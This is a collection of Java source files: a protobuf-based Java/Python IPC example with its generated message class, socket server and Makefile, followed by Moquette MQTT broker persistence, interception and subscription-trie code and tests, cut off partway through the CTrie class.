if (((from_bitField0_ & 0x00000002) == 0x00000002)) {
to_bitField0_ |= 0x00000002;
}
result.name_ = name_;
if (((from_bitField0_ & 0x00000004) == 0x00000004)) {
to_bitField0_ |= 0x00000004;
}
result.data_ = data_;
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof com.zlalanne.Message.Command) {
return mergeFrom((com.zlalanne.Message.Command)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(com.zlalanne.Message.Command other) {
if (other == com.zlalanne.Message.Command.getDefaultInstance()) return this;
if (other.hasType()) {
setType(other.getType());
}
if (other.hasName()) {
bitField0_ |= 0x00000002;
name_ = other.name_;
onChanged();
}
if (other.hasData()) {
bitField0_ |= 0x00000004;
data_ = other.data_;
onChanged();
}
this.mergeUnknownFields(other.getUnknownFields());
return this;
}
public final boolean isInitialized() {
if (!hasType()) {
return false;
}
if (!hasName()) {
return false;
}
return true;
}
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
com.zlalanne.Message.Command parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (com.zlalanne.Message.Command) e.getUnfinishedMessage();
throw e;
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private com.zlalanne.Message.Command.CommandType type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public boolean hasType() {
return ((bitField0_ & 0x00000001) == 0x00000001);
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public com.zlalanne.Message.Command.CommandType getType() {
return type_;
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public Builder setType(com.zlalanne.Message.Command.CommandType value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
type_ = value;
onChanged();
return this;
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public Builder clearType() {
bitField0_ = (bitField0_ & ~0x00000001);
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
onChanged();
return this;
}
private java.lang.Object name_ = "";
/**
* <code>required string name = 2;</code>
*/
public boolean hasName() {
return ((bitField0_ & 0x00000002) == 0x00000002);
}
/**
* <code>required string name = 2;</code>
*/
public java.lang.String getName() {
java.lang.Object ref = name_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
name_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>required string name = 2;</code>
*/
public com.google.protobuf.ByteString
getNameBytes() {
java.lang.Object ref = name_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
name_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>required string name = 2;</code>
*/
public Builder setName(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000002;
name_ = value;
onChanged();
return this;
}
/**
* <code>required string name = 2;</code>
*/
public Builder clearName() {
bitField0_ = (bitField0_ & ~0x00000002);
name_ = getDefaultInstance().getName();
onChanged();
return this;
}
/**
* <code>required string name = 2;</code>
*/
public Builder setNameBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000002;
name_ = value;
onChanged();
return this;
}
private java.lang.Object data_ = "";
/**
* <code>optional string data = 3;</code>
*/
public boolean hasData() {
return ((bitField0_ & 0x00000004) == 0x00000004);
}
/**
* <code>optional string data = 3;</code>
*/
public java.lang.String getData() {
java.lang.Object ref = data_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
data_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string data = 3;</code>
*/
public com.google.protobuf.ByteString
getDataBytes() {
java.lang.Object ref = data_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
data_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string data = 3;</code>
*/
public Builder setData(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000004;
data_ = value;
onChanged();
return this;
}
/**
* <code>optional string data = 3;</code>
*/
public Builder clearData() {
bitField0_ = (bitField0_ & ~0x00000004);
data_ = getDefaultInstance().getData();
onChanged();
return this;
}
/**
* <code>optional string data = 3;</code>
*/
public Builder setDataBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000004;
data_ = value;
onChanged();
return this;
}
// @@protoc_insertion_point(builder_scope:Command)
}
static {
defaultInstance = new Command(true);
defaultInstance.initFields();
}
// @@protoc_insertion_point(class_scope:Command)
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_Command_descriptor;
private static
com.google.protobuf.GeneratedMessage.FieldAccessorTable
internal_static_Command_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\rmessage.proto\"\203\001\n\007Command\022\"\n\004type\030\001 \002(" +
"\0162\024.Command.CommandType\022\014\n\004name\030\002 \002(\t\022\014\n" +
"\004data\030\003 \001(\t\"8\n\013CommandType\022\016\n\nSTART_TEST" +
"\020\000\022\013\n\007RESULTS\020\001\022\014\n\010SHUTDOWN\020\002B\016\n\014com.zla" +
"lanne"
};
com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner =
new com.google.protobuf.Descriptors.FileDescriptor. InternalDescriptorAssigner() {
public com.google.protobuf.ExtensionRegistry assignDescriptors(
com.google.protobuf.Descriptors.FileDescriptor root) {
descriptor = root;
return null;
}
};
com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
}, assigner);
internal_static_Command_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_Command_fieldAccessorTable = new
com.google.protobuf.GeneratedMessage.FieldAccessorTable(
internal_static_Command_descriptor,
new java.lang.String[] { "Type", "Name", "Data", });
}
// @@protoc_insertion_point(outer_class_scope)
}
<|start_filename|>java/src/com/zlalanne/Server.java<|end_filename|>
package com.zlalanne;
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import com.zlalanne.Message.Command;
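/**
 * Minimal blocking server: accepts a single client on PORT and reads length-delimited
 * Command messages (Command.parseDelimitedFrom) in a loop. START_TEST only logs the test
 * name, SHUTDOWN stops the loop, and other command types (e.g. RESULTS) are ignored.
 */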
public class Server {
final private int PORT = 9999;
private ServerSocket serverSocket;
public Server() {
try {
serverSocket = new ServerSocket(PORT);
} catch (IOException e) {
e.printStackTrace();
}
}
public void run() {
boolean running = true;
try {
System.out.println("Waiting for connection on port " + PORT);
Socket clientSocket = serverSocket.accept();
System.out.println("Connection established. Waiting for messages...");
OutputStream os = clientSocket.getOutputStream();
InputStream is = clientSocket.getInputStream();
while(running) {
Command cmd = Command.parseDelimitedFrom(is);
switch(cmd.getType()) {
case START_TEST: {
// Process START_TEST
System.out.println("Processing START_TEST");
System.out.println("Running test " + cmd.getName());
break;
}
case SHUTDOWN: {
System.out.println("Stopping the server...");
running = false;
break;
}
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
<|start_filename|>Makefile<|end_filename|>
#
# Makefile to call protocol buffer compiler for Java/Python
#
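# Typical usage (assumes protoc, i.e. $(CC), is installed and on PATH):
#   make        # regenerates python/message_pb2.py and java/src/com/zlalanne/Message.java
#   make clean  # removes both generated sources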
CC :=protoc
SRC :=message.proto
PYTHON_OUT :=python/message_pb2.py
JAVA_OUT :=java/src/com/zlalanne/Message.java
all: $(PYTHON_OUT) $(JAVA_OUT)
$(PYTHON_OUT): $(SRC)
$(CC) $(SRC) --python_out=$(dir $@)
$(JAVA_OUT): $(SRC)
$(CC) $(SRC) --java_out=$(dir $@)../../
clean:
$(RM) $(PYTHON_OUT)
$(RM) $(JAVA_OUT)
| zlalanne/java-python-ipc-protobuf |
<|start_filename|>broker/src/main/java/io/moquette/persistence/ByteBufDataType.java<|end_filename|>
/*
* Copyright (c) 2012-2021 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.persistence;
import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;
import org.h2.mvstore.DataUtils;
import org.h2.mvstore.WriteBuffer;
import java.nio.ByteBuffer;
public final class ByteBufDataType implements org.h2.mvstore.type.DataType {
@Override
public int compare(Object a, Object b) {
return 0;
}
@Override
public int getMemory(Object obj) {
if (!(obj instanceof ByteBuf)) {
throw new IllegalArgumentException("Expected instance of ByteBuf but found " + obj.getClass());
}
final int payloadSize = ((ByteBuf) obj).readableBytes();
return 4 + payloadSize;
}
@Override
public void read(ByteBuffer buff, Object[] obj, int len, boolean key) {
for (int i = 0; i < len; i++) {
obj[i] = read(buff);
}
}
@Override
public void write(WriteBuffer buff, Object[] obj, int len, boolean key) {
for (int i = 0; i < len; i++) {
write(buff, obj[i]);
}
}
@Override
public ByteBuf read(ByteBuffer buff) {
final int payloadSize = buff.getInt();
byte[] payload = new byte[payloadSize];
buff.get(payload);
return Unpooled.wrappedBuffer(payload);
}
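// Wire layout shared by read() and write(): a 4-byte int length prefix followed by the raw
// payload bytes, which is why getMemory() reports 4 + readableBytes().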
@Override
public void write(WriteBuffer buff, Object obj) {
final ByteBuf casted = (ByteBuf) obj;
final int payloadSize = casted.readableBytes();
byte[] rawBytes = new byte[payloadSize];
casted.copy().readBytes(rawBytes).release();
buff.putInt(payloadSize);
buff.put(rawBytes);
}
}
<|start_filename|>broker/src/main/java/io/moquette/interception/AbstractInterceptHandler.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.interception;
import io.moquette.interception.messages.InterceptAcknowledgedMessage;
import io.moquette.interception.messages.InterceptConnectMessage;
import io.moquette.interception.messages.InterceptConnectionLostMessage;
import io.moquette.interception.messages.InterceptDisconnectMessage;
import io.moquette.interception.messages.InterceptPublishMessage;
import io.moquette.interception.messages.InterceptSubscribeMessage;
import io.moquette.interception.messages.InterceptUnsubscribeMessage;
/**
 * Basic abstract class, useful for avoiding the creation of empty methods in subclasses.
 */
public abstract class AbstractInterceptHandler implements InterceptHandler {
@Override
public Class<?>[] getInterceptedMessageTypes() {
return InterceptHandler.ALL_MESSAGE_TYPES;
}
@Override
public void onConnect(InterceptConnectMessage msg) {
}
@Override
public void onDisconnect(InterceptDisconnectMessage msg) {
}
@Override
public void onConnectionLost(InterceptConnectionLostMessage msg) {
}
@Override
public void onPublish(InterceptPublishMessage msg) {
msg.getPayload().release();
}
@Override
public void onSubscribe(InterceptSubscribeMessage msg) {
}
@Override
public void onUnsubscribe(InterceptUnsubscribeMessage msg) {
}
@Override
public void onMessageAcknowledged(InterceptAcknowledgedMessage msg) {
}
}
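// A minimal usage sketch (hypothetical subclass, not part of this file): override only the
// callbacks of interest and inherit the empty defaults above. Names not shown in this file
// (getID() on InterceptHandler, getTopicName() on InterceptPublishMessage) are assumptions
// about the surrounding API and should be verified before use.
//
// public class PublishLoggingHandler extends AbstractInterceptHandler {
//     @Override
//     public String getID() {                       // assumed to be required by InterceptHandler
//         return "PublishLoggingHandler";
//     }
//
//     @Override
//     public void onPublish(InterceptPublishMessage msg) {
//         System.out.println("Published on " + msg.getTopicName()); // assumed accessor
//         super.onPublish(msg);                     // base class releases the payload buffer
//     }
// }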
<|start_filename|>broker/src/test/java/io/moquette/broker/subscriptions/CTrieTest.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
import io.netty.handler.codec.mqtt.MqttQoS;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Optional;
import java.util.Set;
import static io.moquette.broker.subscriptions.Topic.asTopic;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class CTrieTest {
private CTrie sut;
@BeforeEach
public void setUp() {
sut = new CTrie();
}
@Test
public void testAddOnSecondLayerWithEmptyTokenOnEmptyTree() {
//Exercise
sut.addToTree(clientSubOnTopic("TempSensor1", "/"));
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/"));
assertTrue(matchedNode.isPresent(), "Node on path / must be present");
//verify structure, only root INode and the first CNode should be present
assertThat(this.sut.root.mainNode().subscriptions).isEmpty();
assertThat(this.sut.root.mainNode().allChildren()).isNotEmpty();
INode firstLayer = this.sut.root.mainNode().allChildren().get(0);
assertThat(firstLayer.mainNode().subscriptions).isEmpty();
assertThat(firstLayer.mainNode().allChildren()).isNotEmpty();
INode secondLayer = firstLayer.mainNode().allChildren().get(0);
assertThat(secondLayer.mainNode().subscriptions).isNotEmpty();
assertThat(secondLayer.mainNode().allChildren()).isEmpty();
}
@Test
public void testAddFirstLayerNodeOnEmptyTree() {
//Exercise
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertTrue(matchedNode.isPresent(), "Node on path /temp must be present");
assertFalse(matchedNode.get().subscriptions.isEmpty());
}
@Test
public void testLookup() {
final Subscription existingSubscription = clientSubOnTopic("TempSensor1", "/temp");
sut.addToTree(existingSubscription);
//Exercise
final Optional<CNode> matchedNode = sut.lookup(asTopic("/humidity"));
//Verify
assertFalse(matchedNode.isPresent(), "Node on path /humidity can't be present");
}
@Test
public void testAddNewSubscriptionOnExistingNode() {
final Subscription existingSubscription = clientSubOnTopic("TempSensor1", "/temp");
sut.addToTree(existingSubscription);
//Exercise
final Subscription newSubscription = clientSubOnTopic("TempSensor2", "/temp");
sut.addToTree(newSubscription);
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertTrue(matchedNode.isPresent(), "Node on path /temp must be present");
final Set<Subscription> subscriptions = matchedNode.get().subscriptions;
assertTrue(subscriptions.contains(newSubscription));
}
@Test
public void testAddNewDeepNodes() {
sut.addToTree(clientSubOnTopic("TempSensorRM", "/italy/roma/temp"));
sut.addToTree(clientSubOnTopic("TempSensorFI", "/italy/firenze/temp"));
sut.addToTree(clientSubOnTopic("HumSensorFI", "/italy/roma/humidity"));
final Subscription happinessSensor = clientSubOnTopic("HappinessSensor", "/italy/happiness");
sut.addToTree(happinessSensor);
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/italy/happiness"));
assertTrue(matchedNode.isPresent(), "Node on path /italy/happiness must be present");
final Set<Subscription> subscriptions = matchedNode.get().subscriptions;
assertTrue(subscriptions.contains(happinessSensor));
}
static Subscription clientSubOnTopic(String clientID, String topicName) {
return new Subscription(clientID, asTopic(topicName), null);
}
@Test
public void givenTreeWithSomeNodeWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Exercise
sut.removeFromTree(asTopic("/temp"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeNodeUnsubscribeAndResubscribeCleanTomb() {
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
assertEquals(1, sut.root.mainNode().allChildren().size()); // looking to see if TNode is cleaned up
}
@Test
public void givenTreeWithSomeNodeWhenRemoveMultipleTimes() {
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
// make sure no TNode exceptions
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeDeepNodeWhenRemoveMultipleTimes() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/test/me/1/2/3"));
// make sure no TNode exceptions
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeNodeHierarchyWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/1"));
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/2"));
//Exercise
sut.removeFromTree(asTopic("/temp/1"), "TempSensor1");
sut.removeFromTree(asTopic("/temp/1"), "TempSensor1");
final Set<Subscription> matchingSubs = sut.recursiveMatch(asTopic("/temp/2"));
//Verify
final Subscription expectedMatchingsub = new Subscription("TempSensor1", asTopic("/temp/2"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs).contains(expectedMatchingsub);
}
@Test
public void givenTreeWithSomeNodeHierarchWhenRemoveContainedSubscriptionSmallerThenNodeIsNotUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/1"));
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/2"));
//Exercise
sut.removeFromTree(asTopic("/temp"), "TempSensor1");
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("/temp/1"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("/temp/2"));
//Verify
// Unsubscribing from /temp should not remove the deeper subscriptions on /temp/1 or /temp/2.
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("/temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor1", asTopic("/temp/2"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
}
@Test
public void givenTreeWithDeepNodeWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/bah/bin/bash"));
sut.removeFromTree(asTopic("/bah/bin/bash"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/bah/bin/bash"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void testMatchSubscriptionNoWildcards() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Exercise
final Set<Subscription> matchingSubs = sut.recursiveMatch(asTopic("/temp"));
//Verify
final Subscription expectedMatchingsub = new Subscription("TempSensor1", asTopic("/temp"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs).contains(expectedMatchingsub);
}
@Test
public void testRemovalInnerTopicOffRootSameClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor1", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor1", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp"), "TempSensor1");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).doesNotContain(expectedMatchingsub1);
assertThat(matchingSubs4).contains(expectedMatchingsub2);
}
@Test
public void testRemovalInnerTopicOffRootDiffClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor2", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor2", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp"), "TempSensor1");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).doesNotContain(expectedMatchingsub1);
assertThat(matchingSubs4).contains(expectedMatchingsub2);
}
@Test
public void testRemovalOuterTopicOffRootDiffClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor2", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor2", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp/1"), "TempSensor2");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).contains(expectedMatchingsub1);
assertThat(matchingSubs4).doesNotContain(expectedMatchingsub2);
}
}
<|start_filename|>broker/src/test/java/io/moquette/integration/MessageCollector.java<|end_filename|>
/*
* Copyright (c) 2012-2016 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.integration;
import org.eclipse.paho.client.mqttv3.IMqttDeliveryToken;
import org.eclipse.paho.client.mqttv3.MqttCallback;
import org.eclipse.paho.client.mqttv3.MqttMessage;
import java.util.concurrent.*;
/**
 * Used in tests to collect all messages received asynchronously by the MqttClient.
 */
public class MessageCollector implements MqttCallback {
private static final class ReceivedMessage {
private final MqttMessage message;
private final String topic;
private ReceivedMessage(MqttMessage message, String topic) {
this.message = message;
this.topic = topic;
}
}
private BlockingQueue<ReceivedMessage> m_messages = new LinkedBlockingQueue<>();
private boolean m_connectionLost;
private volatile boolean messageReceived = false;
/**
 * Returns the next message from the queue if one is available; otherwise returns null
 * immediately, without waiting.
 */
public MqttMessage getMessageImmediate() {
if (m_messages.isEmpty()) {
return null;
}
try {
return m_messages.take().message;
} catch (InterruptedException e) {
return null;
}
}
public MqttMessage retrieveMessage() throws InterruptedException {
final ReceivedMessage content = m_messages.take();
messageReceived = false;
return content.message;
}
public String retrieveTopic() throws InterruptedException {
final ReceivedMessage content = m_messages.take();
messageReceived = false;
return content.topic;
}
public boolean isMessageReceived() {
return messageReceived;
}
void reinit() {
m_messages = new LinkedBlockingQueue<>();
m_connectionLost = false;
messageReceived = false;
}
public boolean connectionLost() {
return m_connectionLost;
}
@Override
public void connectionLost(Throwable cause) {
m_connectionLost = true;
}
@Override
public void messageArrived(String topic, MqttMessage message) {
m_messages.offer(new ReceivedMessage(message, topic));
messageReceived = true;
}
/**
 * Invoked when a message sent to the broker has been acknowledged (PUBACK or PUBCOMP from the broker).
 */
@Override
public void deliveryComplete(IMqttDeliveryToken token) {
// try {
// token.waitForCompletion(1_000);
// m_messages.offer(new ReceivedMessage(token.getMessage(), token.getTopics()[0]));
// } catch (MqttException e) {
// e.printStackTrace();
// }
}
}
<|start_filename|>broker/src/main/java/io/moquette/persistence/H2PersistentQueue.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.persistence;
import io.moquette.broker.SessionRegistry;
import org.h2.mvstore.MVMap;
import org.h2.mvstore.MVStore;
import java.util.AbstractQueue;
import java.util.Iterator;
import java.util.concurrent.atomic.AtomicLong;
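/**
 * Persistent FIFO queue backed by two MVStore maps: one ("queue_" + queueName) holds the
 * enqueued messages keyed by a monotonically increasing index, the other ("..._meta") stores
 * the current "head" and "tail" indexes so the queue position survives restarts. offer()
 * writes at head and advances it; poll() reads at tail, removes the entry and advances tail.
 */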
class H2PersistentQueue extends AbstractQueue<SessionRegistry.EnqueuedMessage> {
private final MVMap<Long, SessionRegistry.EnqueuedMessage> queueMap;
private final MVMap<String, Long> metadataMap;
private final AtomicLong head;
private final AtomicLong tail;
H2PersistentQueue(MVStore store, String queueName) {
if (queueName == null || queueName.isEmpty()) {
throw new IllegalArgumentException("queueName parameter can't be empty or null");
}
final MVMap.Builder<Long, SessionRegistry.EnqueuedMessage> messageTypeBuilder =
new MVMap.Builder<Long, SessionRegistry.EnqueuedMessage>()
.valueType(new EnqueuedMessageValueType());
this.queueMap = store.openMap("queue_" + queueName, messageTypeBuilder);
this.metadataMap = store.openMap("queue_" + queueName + "_meta");
//setup head index
long headIdx = 0L;
if (this.metadataMap.containsKey("head")) {
headIdx = this.metadataMap.get("head");
} else {
this.metadataMap.put("head", headIdx);
}
this.head = new AtomicLong(headIdx);
//setup tail index
long tailIdx = 0L;
if (this.metadataMap.containsKey("tail")) {
tailIdx = this.metadataMap.get("tail");
} else {
this.metadataMap.put("tail", tailIdx);
}
this.tail = new AtomicLong(tailIdx);
}
static void dropQueue(MVStore store, String queueName) {
store.removeMap(store.openMap("queue_" + queueName));
store.removeMap(store.openMap("queue_" + queueName + "_meta"));
}
@Override
public Iterator<SessionRegistry.EnqueuedMessage> iterator() {
return null;
}
@Override
public int size() {
return this.head.intValue() - this.tail.intValue();
}
@Override
public boolean offer(SessionRegistry.EnqueuedMessage t) {
if (t == null) {
throw new NullPointerException("Inserted element can't be null");
}
final long nextHead = head.getAndIncrement();
this.queueMap.put(nextHead, t);
this.metadataMap.put("head", nextHead + 1);
return true;
}
@Override
public SessionRegistry.EnqueuedMessage poll() {
if (head.equals(tail)) {
return null;
}
final long nextTail = tail.getAndIncrement();
final SessionRegistry.EnqueuedMessage tail = this.queueMap.get(nextTail);
queueMap.remove(nextTail);
this.metadataMap.put("tail", nextTail + 1);
return tail;
}
@Override
public SessionRegistry.EnqueuedMessage peek() {
if (head.equals(tail)) {
return null;
}
return this.queueMap.get(tail.get());
}
}
<|start_filename|>broker/src/main/java/io/moquette/broker/subscriptions/CTrie.java<|end_filename|>
package io.moquette.broker.subscriptions;
import java.util.Collections;
import java.util.HashSet;
import java.util.Optional;
import java.util.Set;
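/**
 * Concurrent subscription trie (CTrie). Each topic level is an INode whose current CNode is
 * replaced atomically: every update copies the CNode, modifies the copy, and swaps it in with
 * compareAndSet, retrying (Action.REPEAT) on contention. A fully emptied leaf is first replaced
 * by a TNode tombstone and then unlinked from its parent in a second CAS (see cleanTomb).
 */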
public class CTrie {
interface IVisitor<T> {
void visit(CNode node, int deep);
T getResult();
}
private static final Token ROOT = new Token("root");
private static final INode NO_PARENT = null;
private enum Action {
OK, REPEAT
}
INode root;
CTrie() {
